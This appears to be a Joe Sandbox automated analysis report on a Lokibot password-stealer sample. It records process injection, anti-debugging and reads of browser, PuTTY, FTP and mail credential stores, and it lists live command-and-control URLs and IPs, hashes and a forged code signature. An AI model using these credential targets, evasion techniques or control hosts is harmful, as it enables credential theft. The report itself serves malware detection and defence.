                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 4724, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: 7980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: 8980000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: 8B30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: 9B30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: A140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: B140000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe TID: 1224Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe TID: 2272Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeThread delayed: delay time: 60000Jump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000003.00000002.2198531195.00000000010F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]3_2_0040317B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,3_2_00402B7C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe"Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Lokibot
                Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 4724, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 5780, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000003.00000002.2198862552.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2198531195.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: PopPassword3_2_0040D069
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: SmtpPassword3_2_0040D069
                Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		1
                Access Token Manipulation                		1
                Masquerading                		2
                OS Credential Dumping                		21
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                Process Injection                		1
                Disable or Modify Tools                		2
                Credentials in Registry                		41
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager1
                File and Directory Discovery                		SMB/Windows Admin Shares2
                Data from Local System                		1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Access Token Manipulation                		NTDS13
                System Information Discovery                		Distributed Component Object ModelInput Capture111
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                Process Injection                		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Deobfuscate/Decode Files or Information                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe24%ReversingLabsByteCode-MSIL.Trojan.Barys
                SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe35%VirustotalBrowse
                SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                windowsupdatebg.s.llnwi.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                http://alphastand.win/alien/fre.php100%URL Reputationmalware
                http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                http://alphastand.top/alien/fre.php100%URL Reputationmalware
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://24.199.107.111/index.php/067255433286212%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                windowsupdatebg.s.llnwi.net
                		69.164.42.0
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: malware
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: malware
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: malware
                		unknown
                http://24.199.107.111/index.php/0672554332862trueunknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.ctvnews.ca/rss/business/ctv-news-business-headlines-1.867648SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exefalse
                  		high
                  http://www.ctvnews.ca/rss/ctvnews-ca-top-stories-public-rss-1.822009SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exefalse
                    		high
                    http://xml.weather.yahoo.com/ns/rss/1.0SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exefalse
                      		high
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exefalse
                      • URL Reputation: safe
                      		unknown
                      http://www.ibsensoftware.com/SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://weather.yahooapis.com/forecastrss?w=4118SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exefalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        24.199.107.111
                        		unknownUnited States
                        		12271TWC-12271-NYCUStrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1427765
                        Start date and time:2024-04-18 06:24:07 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 2s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 124
                        • Number of non-executed functions: 17
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        06:25:15API Interceptor2x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        24.199.107.111Payment Advice16007618765.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111/index.php/0672554332862
                        Payment Advice1600761165.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111/index.php/0672554332862
                        RFQ_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 24.199.107.111/index.php/927339792
                        QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 24.199.107.111/index.php/2028
                        FedEx_AWB#53023114643.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111/index.php/0672554332862
                        DHL_Awb# 12944422091.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111/index.php/720637
                        DHLAwb#1294404291.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111/index.php/720637

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        windowsupdatebg.s.llnwi.nethttp://ranchpools.comGet hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        https://mmx1.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-833-289-0083Get hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        https://smincorporation.com/kr.html#sangdon.yeom@hyundaimovex.comGet hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        https://eNewsletter.cityemployeesclub.com/t/r-l-tiutyult-uklhkkukdd-d/Get hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        http://mitchellind.ubpages.com/mi-ind/Get hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        http://zacharryblogs.comGet hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        https://theredhendc.comGet hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        http://rakuten.co.jp.rakutle.xyz/Get hashmaliciousUnknownBrowse
                        • 69.164.42.0
                        https://llp61.z1.web.core.windows.net/werrx01USAHTML/?bcda=1-883-293-0114Get hashmaliciousTechSupportScamBrowse
                        • 69.164.42.0
                        https://s15dfwgqg6tutek.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=nullGet hashmaliciousTechSupportScamBrowse
                        • 69.164.42.0

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        TWC-12271-NYCUS0FnrrE8B6Y.elfGet hashmaliciousMiraiBrowse
                        • 208.120.167.230
                        Payment Advice16007618765.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111
                        Payment Advice1600761165.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111
                        RFQ_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 24.199.107.111
                        QUOTE AL ZARQA MILITARY HOSPITAL#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                        • 24.199.107.111
                        FedEx_AWB#53023114643.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111
                        sYlwfFFwFb.elfGet hashmaliciousMiraiBrowse
                        • 208.105.0.121
                        vEnh6fr6F0.elfGet hashmaliciousUnknownBrowse
                        • 69.86.172.137
                        DHL_Awb# 12944422091.exeGet hashmaliciousLokibotBrowse
                        • 24.199.107.111
                        d94i39z585.elfGet hashmaliciousMiraiBrowse
                        • 72.229.115.220

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Roaming\188E93\31437F.lck

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:1

                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

                        Download File
                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47
                        Entropy (8bit):1.168829563685559
                        Encrypted:false
                        SSDEEP:3:/lSll2DQi:AoMi
                        MD5:DAB633BEBCCE13575989DCFA4E2203D6
                        SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                        SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                        SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:........................................user.

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.8555452479040735
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                        • Win32 Executable (generic) a (10002005/4) 49.93%
                        • Windows Screen Saver (13104/52) 0.07%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        File name:SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
                        File size:628'232 bytes
                        MD5:4758a063f737c4cbd89a8ae27fe51f46
                        SHA1:33a78c132bdfcdcb1d55d26770942f076ff3dec8
                        SHA256:9b7d88f0ea7556298e0dee39226de3688d8df6d237bfdb6d7ecfa7a8dac85bdf
                        SHA512:f41ffd21b9ee1fad0f169e7805954fc772082488b1a6ef9d6f0c9dca1984f21c2f860d74187e882895388b46180500eb22fb2d010817c336e1d8930b645e9098
                        SSDEEP:12288:4LK/pbMIRwwAFTKySdcGBtF4V4AmlaBJe5YZ4VX2i3QkR:4LiMIgTKyCcYapBpS2i3X
                        TLSH:8BD412207AA88750E478AFF518B61110E7B2B6621071D34D6EE990CF4AD6FC0E716BDF
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y f..............0.. ...0.......4... ...@....@.. ....................................@................................

                        File Icon

                        Icon Hash:6dd4d6ccd6d0b24c

                        Static PE Info

                        General

                        Entrypoint:0x4934da
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x662079F2 [Thu Apr 18 01:40:02 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Authenticode Signature

                        Signature Valid:false
                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                        Signature Validation Error:The digital signature of the object did not verify
                        Error Number:-2146869232
                        Not Before, Not After
                        • 13/11/2018 01:00:00 09/11/2021 00:59:59
                        Subject Chain
                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                        Version:3
                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                        Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                        Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                        Serial:7C1118CBBADC95DA3752C46E47A27438

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
